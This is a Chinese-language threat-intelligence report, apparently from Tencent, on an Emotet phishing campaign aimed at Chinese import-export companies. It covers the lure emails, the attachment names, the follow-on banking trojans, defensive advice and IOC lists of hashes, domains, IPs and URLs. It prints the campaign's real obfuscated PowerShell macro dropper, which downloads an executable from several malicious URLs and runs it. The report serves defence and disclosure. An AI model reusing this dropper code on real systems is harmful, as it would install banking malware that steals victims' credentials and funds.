一、背景
Emotet具有用于进行银行欺诈的模块,主要针对德国,奥地利和瑞士的银行进行攻击,多年来,该恶意软件被全球安全厂商归类为银行木马。近期,腾讯安全御见威胁情报中心监测到Emotet银行木马针对国内的攻击呈明显上升趋势,从事进出口贸易的企业是Emotet银行木马的主要目标。
此次攻击具有以下特点:
1.钓鱼邮件利用恶意宏代码下载攻击载荷;
2.钓鱼邮件使用德语、西班牙语、波兰语、英语等多种语言;
3.攻击者伪造大量虚假邮箱作为发件人(超过100个,详见IOCs);
4.攻击载荷Emotet会继续下载其他银行木马作为Payload;
5.银行木马能够检测用户银行登录行为,通过读取隐私数据获取账号密码登录信息,甚至通过注入恶意代码到交互页面,从而在用户进行网银相关操作时盗取帐户资产。
部分受攻击企业如下:
根据腾讯安全御见威胁情报中心统计数据,Emotet针对国内的钓鱼邮件攻击最严重地区为广东省、北京市、上海市、江苏省等地。该病毒影响的地区分布如下:
从病毒攻击影响的行业来看,受害最严重的是传统制造业、教育咨询(特别是国际教育)、商务贸易。具体受影响行业分布如下:
二、详细分析
攻击者构造大量虚假发件人(完整列表见IOCs):
。。。
钓鱼邮件使用德语、西班牙语、波兰语、英语等多种语言。
德语:
西班牙语:
英语:
邮件主题通常涉及交易,付款和发票。包括:“ ACH付款信息”,“付款通知”,“发票交易”,“逾期付款”,“已付款发票”,“销售发票”,“状态更新”,“所需文件”,“新订单” ,“收据”。
有意思的是,我们在溯源过程中还发现了某精密仪器制造公司georgfischer收到的来自邮件服务商ix.netcom.com的威胁告警邮件,邮件提醒该公司警惕正在发生的攻击。
邮件标题及译文如下:
Attention! – Please be careful with email attachments. A Virus – Trojan attack is currently under way (TA542:)
译文:
注意!-请小心电子邮件附件。病毒-特洛伊木马正在进行攻击(TA542:)
根据对应的官网介绍,被警告的公司georgfischer创建于1802 年,总部位于瑞士,在 33 个国家经营着140家公司,其中57家是生产基地,业务覆盖液体气体安全输送、轻质铸造件以及高精度制造技术等领域,是一家跨国集团公司。
Georgfischer的相关人员在收到邮件服务商的提醒邮件后,又将邮件文件打包发给了德国电信公司旗下网络安全公司t-systems.com,并请求该公司将攻击邮件的发件人使用的邮箱锁定,以期达到防御目标。
邮件内容及译文如下:
Dear helpdesk,
Dear Janos
Kindly check whether fraud attack and block this sender
Best Helmut
译文:
Dear helpdesk,
Dear Janos
请检查是否有欺诈攻击并阻止此发件人
Best Helmut
被求助的t-systems是德国电信(DeutscheTelekom)子公司,该公司提供网络基础设施服务。
我们捕获到攻击者使用的钓鱼邮件附件文档名如下:
SCAN_5PYSF6A1BR.doc
DOC_NPKICRA3C6LQW9Y_ACD.doc
Dok_393027_2112976231.rtf
Santander 682634154514193.doc
INF_XOUZRYAJ7TZ9G6J_18092019.doc
Alb. 525 .doc
DOK_62597273590_A.doc
055843559 factura septiembre.doc
INF_931516975144_B.doc
附件文档中均附带恶意的宏代码:
宏代码利用Powershell下载银行木马emotet,下载时使用的URL地址以“@”分割记录,其中的5个地址会被依次请求进行下载。
$DIiMMwdP='pw79UV5N';$r89Bqv9M = '523';$z1oZiDj='Ol_qmEC';$Lj6JlLHz=$env:userprofile+'\'+$r89Bqv9M+'.exe';
$qt4En6DB='R3vqiSFT';$CiILkHUo=.('ne'+'w-ob'+'ject') neT.wEbCLIENt;$qWG_jzZV='
http[:]//shael.org/hosting/TYXchcKkHz/
@http[:]//www.lottizzazionesavarra.it/wp-admin/zMifZDPur/
@https[:]//herrenmode.tk/5usqjlew/ttg22zcf_q5chov-377215/
@http[:]//nfbio.com/img/upload_Image/edm/pic_2/u6q4ucq7_hyg8uzhh-369963559/
@http[:]//endofhisrope.net/2008-08_PSBearDonate/qmiuOZvDj/'."Sp`LiT"('@');$lt5rEpMz='NTMPsFi';
foreach($AkOZPzW in $qWG_jzZV){try{$CiILkHUo."dO`w`Nl`oAdfile"($AkOZPzW, $Lj6JlLHz);$lWdD4O='vbXhwM6';If ((&('Get-'+'I'+'tem') $Lj6JlLHz)."L`eNgTH" -ge 24814) {[Diagnostics.Process]::"STa`Rt"($Lj6JlLHz);$K_0tQwob='a9dvKGGb';break;$BcRHRV4='FSAmRV6'}}catch{}}$ErZcNH='wnWqFd_a'
下载Emotet网络流量如下:
早期版本的Emotet具有银行欺诈模块,主要针对银行进行攻击。更高版本的Emotet不再加载其自己的银行木马模块,而是加载第三方银行木马恶意软件。
Emotet收集系统信息,加密后发送至服务器,然后继续下载第三方载荷,包括Qbot,The Trick,IcedID和Gootkit等木马。
这些银行木马最终通过检测用户网银登录行为,通过读取隐私数据获取账号密码信息,甚至通过注入恶意代码到交互页面,从而在用户的银行相关操作过程时盗取账户资产及机密信息。
三、安全建议
1、我们建议企业邮箱网管根据本文末尾提供的IOCs信息,将危险发件人邮箱设置为黑名单;
2、建议企业通过培训,教育员工不要打开不明来源的邮件附件,对于附件中的文件要谨慎打开,如果附件是可执行程序,一定不要随意运行;
3、升级office系列软件到最新版本,及时修复office组件漏洞,除非确认文档来源可靠,否则不要启用宏;
IOCs
发件邮箱
[email protected]egypt.com
tesoreri[email protected]
DOC(钓鱼邮件附件文件)
69163d86ceec013b59fc929cee88e07a
7b14e01fe4fe705a3add1a9d1c3aba42
00f502fb9fdc87e892b6f13260c5dde5
dd29f94772fec370c9fe01efb6d9ae47
6e5334da4bf6e579eb227ddba9c96e48
2c5ef063217fb3989bbe464265b5c894
f273d0014aaf58ed56a557b0531f339a
29df0bb5c6d77bd88eba85409f4f9172
82f0ee5d0f009f989e0ab3f9fe37aa86
d04617c9f25d729e7db52cc009e175d0
d206d5bd7fd0f9218ddab766de9d326a
e013e8ac575eeab6195caf07085098bc
2f2b014b7348a9aa3b1ccddf5b20be56
ba8533dcc3053527a08afafdab094373
ba222b5181a1429511c061176503cad7
64be822e76a6c19e2e11e22cb755e1b8
9de79dfc8de476a5f3908f934b33a937
fe8c07e33eadafab80e9a8e1351eee0d
Emotet
4f34a0fcc16ae643624d1f5a7d048a99
d27f692276898374f578ab6d207ab063
Domain
shael.org
lottizzazionesavarra.it
nfbio.com
herrenmode.tk
endofhisrope.net
IP
190.106.97.230
186.75.241.230
URL
http[:]//shael.org/hosting/TYXchcKkHz/
http[:]//shael.org/cgi-sys/suspendedpage.cgi
http[:]//www.lottizzazionesavarra.it/wp-admin/zMifZDPur/
http[:]//nfbio.com/img/upload_Image/edm/pic_2/u6q4ucq7_hyg8uzhh-369963559/
https[:]//herrenmode.tk/5usqjlew/ttg22zcf_q5chov-377215/
http[:]//endofhisrope.net/2008-08_PSBearDonate/qmiuOZvDj/
http[:]//190.106.97.230/report/health/add/merge/
http[:]//186.75.241.230/img/jit/xian/
http[:]//186.75.241.230/glitch/enabled/
参考链接:
https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service
如有侵权请联系:admin#unsafe.sh